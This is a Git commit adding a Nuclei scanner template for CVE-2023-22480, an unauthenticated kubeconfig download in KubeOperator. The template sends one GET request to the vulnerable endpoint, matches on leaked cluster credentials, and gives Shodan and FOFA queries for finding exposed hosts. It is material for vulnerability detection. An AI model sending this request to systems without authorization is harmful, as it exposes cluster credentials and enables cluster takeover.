Create CVE-2023-22480.yaml

patch-1
Dhiyaneshwaran 2023-08-05 14:16:12 +05:30 committed by GitHub
parent 41207e36f0
commit 4d1578d6e7
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 45 additions and 0 deletions

View File

@ -0,0 +1,45 @@
id: CVE-2023-22480
info:
name: KubeOperator Foreground kubeconfig Download
author: DhiyaneshDk
severity: critical
description: |
KubeOperator is an open source Kubernetes distribution focused on helping enterprises plan, deploy and operate production-level K8s clusters. In KubeOperator versions 3.16.3 and below, API interfaces with unauthorized entities and can leak sensitive information. This vulnerability could be used to take over the cluster under certain conditions. This issue has been patched in version 3.16.4.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2023-22480
- https://github.com/KubeOperator/KubeOperator/security/advisories/GHSA-jxgp-jgh3-8jc8
- https://github.com/PeiQi0/PeiQi-WIKI-Book/blob/main/docs/wiki/webapp/KubeOperator/KubeOperator%20kubeconfig%20%E6%9C%AA%E6%8E%88%E6%9D%83%E8%AE%BF%E9%97%AE%E6%BC%8F%E6%B4%9E%20CVE-2023-22480.md?plain=1
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cwe-id: CWE-863
metadata:
max-request: 1
shodan-query: html:"KubeOperator"
fofa-query: app="KubeOperator"
verified: true
tags: cve,cve2023,kubeoperator,k8s,kubeconfig
http:
- method: GET
path:
- "{{BaseURL}}/api/v1/clusters/kubeconfig/k8s"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "apiVersion:"
- "clusters:"
condition: and
- type: word
part: header
words:
- "application/download"
- type: status
status:
- 200